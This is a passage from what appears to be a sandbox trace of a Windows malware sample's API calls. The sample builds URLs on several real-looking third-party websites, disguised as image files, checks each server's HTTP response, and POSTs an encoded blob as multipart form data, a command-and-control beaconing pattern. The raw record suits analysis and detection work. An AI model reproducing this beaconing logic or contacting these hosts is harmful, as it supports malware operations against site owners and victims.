(lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0138.596] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0138.596] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0138.596] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0138.596] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0138.596] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.krishnagrp.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0138.596] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0138.596] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="uploads/assets/dafu.jpg") returned 23 [0138.597] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/assets/dafu.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0138.597] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0140.152] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0140.154] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0140.154] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.154] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.155] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0140.155] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://big-game-fishing-croatia.hr") returned 34 [0140.155] lstrcpyW (in: lpString1=0x2e8d880, lpString2="uploads" | out: lpString1="uploads") returned="uploads" [0140.155] lstrcpyW (in: lpString1=0x2e8da80, lpString2="imgs" | out: lpString1="imgs") returned="imgs" [0140.155] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="me" | out: lpString1="me") returned="me" [0140.155] lstrcatW (in: lpString1="me", lpString2="da" | out: lpString1="meda") returned="meda" [0140.155] lstrcpyW (in: lpString1=0x2e8de80, lpString2="bmp" | out: lpString1="bmp") returned="bmp" [0140.155] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://big-game-fishing-croatia.hr/uploads/imgs/meda.bmp") returned 56 [0140.155] lstrlenW (lpString="http://big-game-fishing-croatia.hr/uploads/imgs/meda.bmp") returned 56 [0140.155] lstrcpyW (in: lpString1=0x2e8d618, lpString2="uploads/imgs/meda.bmp" | out: lpString1="uploads/imgs/meda.bmp") returned="uploads/imgs/meda.bmp" [0140.155] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0140.155] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0140.155] InternetConnectW (hInternet=0xcc0008, lpszServerName="big-game-fishing-croatia.hr", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0140.155] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0140.155] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0140.155] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0140.924] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0140.924] lstrcmpiA (lpString1="30x", lpString2="30x") returned 0 [0140.925] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0140.925] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0140.925] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0140.925] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0140.925] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0140.925] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0140.925] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0140.925] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0140.925] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0140.925] InternetConnectW (hInternet=0xcc0004, lpszServerName="big-game-fishing-croatia.hr", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0140.925] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0140.926] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="uploads/imgs/meda.bmp") returned 21 [0140.926] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="uploads/imgs/meda.bmp", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0140.926] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0144.354] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0144.355] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0144.356] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.356] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.356] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0144.356] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://mauricionacif.com") returned 24 [0144.356] lstrcpyW (in: lpString1=0x2e8d880, lpString2="static" | out: lpString1="static") returned="static" [0144.356] lstrcpyW (in: lpString1=0x2e8da80, lpString2="tmp" | out: lpString1="tmp") returned="tmp" [0144.356] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="es" | out: lpString1="es") returned="es" [0144.356] lstrcatW (in: lpString1="es", lpString2="am" | out: lpString1="esam") returned="esam" [0144.356] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0144.356] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://mauricionacif.com/static/tmp/esam.jpg") returned 44 [0144.356] lstrlenW (lpString="http://mauricionacif.com/static/tmp/esam.jpg") returned 44 [0144.356] lstrcpyW (in: lpString1=0x2e8d618, lpString2="static/tmp/esam.jpg" | out: lpString1="static/tmp/esam.jpg") returned="static/tmp/esam.jpg" [0144.356] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0144.356] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0144.356] InternetConnectW (hInternet=0xcc0008, lpszServerName="mauricionacif.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0144.356] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0144.356] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0144.356] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0145.983] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0145.983] lstrcmpiA (lpString1="50x", lpString2="30x") returned 1 [0145.983] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0145.986] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0145.986] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0145.986] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0145.986] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0145.986] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0145.986] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0145.986] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0145.986] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0145.986] InternetConnectW (hInternet=0xcc0004, lpszServerName="mauricionacif.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0145.987] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0145.987] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="static/tmp/esam.jpg") returned 19 [0145.987] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="static/tmp/esam.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0145.987] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0146.761] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0146.761] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0146.762] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.762] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0146.762] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0146.762] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://www.ismcrossconnect.com") returned 30 [0146.762] lstrcpyW (in: lpString1=0x2e8d880, lpString2="news" | out: lpString1="news") returned="news" [0146.762] lstrcpyW (in: lpString1=0x2e8da80, lpString2="imgs" | out: lpString1="imgs") returned="imgs" [0146.762] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="ka" | out: lpString1="ka") returned="ka" [0146.762] lstrcatW (in: lpString1="ka", lpString2="de" | out: lpString1="kade") returned="kade" [0146.763] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0146.763] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://www.ismcrossconnect.com/news/imgs/kade.jpg") returned 49 [0146.763] lstrlenW (lpString="http://www.ismcrossconnect.com/news/imgs/kade.jpg") returned 49 [0146.763] lstrcpyW (in: lpString1=0x2e8d618, lpString2="news/imgs/kade.jpg" | out: lpString1="news/imgs/kade.jpg") returned="news/imgs/kade.jpg" [0146.763] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0146.763] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0146.763] InternetConnectW (hInternet=0xcc0008, lpszServerName="www.ismcrossconnect.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0146.763] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0146.763] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0146.763] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0148.462] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0148.462] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0148.462] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0148.464] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0148.464] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0148.464] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0148.465] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0148.465] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0148.465] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0148.465] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0148.465] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0148.465] InternetConnectW (hInternet=0xcc0004, lpszServerName="www.ismcrossconnect.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0148.465] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2ec0000 [0148.465] wsprintfW (in: param_1=0x2ec0000, param_2="%s" | out: param_1="news/imgs/kade.jpg") returned 18 [0148.465] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="news/imgs/kade.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0148.465] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2e90000*, dwOptionalLength=0x24c | out: lpOptional=0x2e90000*) returned 1 [0148.584] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0148.585] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0148.585] VirtualFree (lpAddress=0x2ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.585] VirtualFree (lpAddress=0x2e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.585] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0148.585] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://aurumwedding.ru") returned 22 [0148.585] lstrcpyW (in: lpString1=0x2e8d880, lpString2="data" | out: lpString1="data") returned="data" [0148.585] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pics" | out: lpString1="pics") returned="pics" [0148.585] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="fu" | out: lpString1="fu") returned="fu" [0148.585] lstrcatW (in: lpString1="fu", lpString2="ke" | out: lpString1="fuke") returned="fuke" [0148.585] lstrcatW (in: lpString1="fuke", lpString2="da" | out: lpString1="fukeda") returned="fukeda" [0148.585] lstrcatW (in: lpString1="fukeda", lpString2="so" | out: lpString1="fukedaso") returned="fukedaso" [0148.586] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0148.586] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://aurumwedding.ru/data/pics/fukedaso.jpg") returned 45 [0148.586] lstrlenW (lpString="http://aurumwedding.ru/data/pics/fukedaso.jpg") returned 45 [0148.586] lstrcpyW (in: lpString1=0x2e8d618, lpString2="data/pics/fukedaso.jpg" | out: lpString1="data/pics/fukedaso.jpg") returned="data/pics/fukedaso.jpg" [0148.586] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0148.586] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0148.586] InternetConnectW (hInternet=0xcc0008, lpszServerName="aurumwedding.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0148.586] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0148.586] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0148.586] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0150.455] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0150.455] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0150.455] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0150.457] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0150.457] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0150.457] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2e90000 [0150.467] lstrlenA 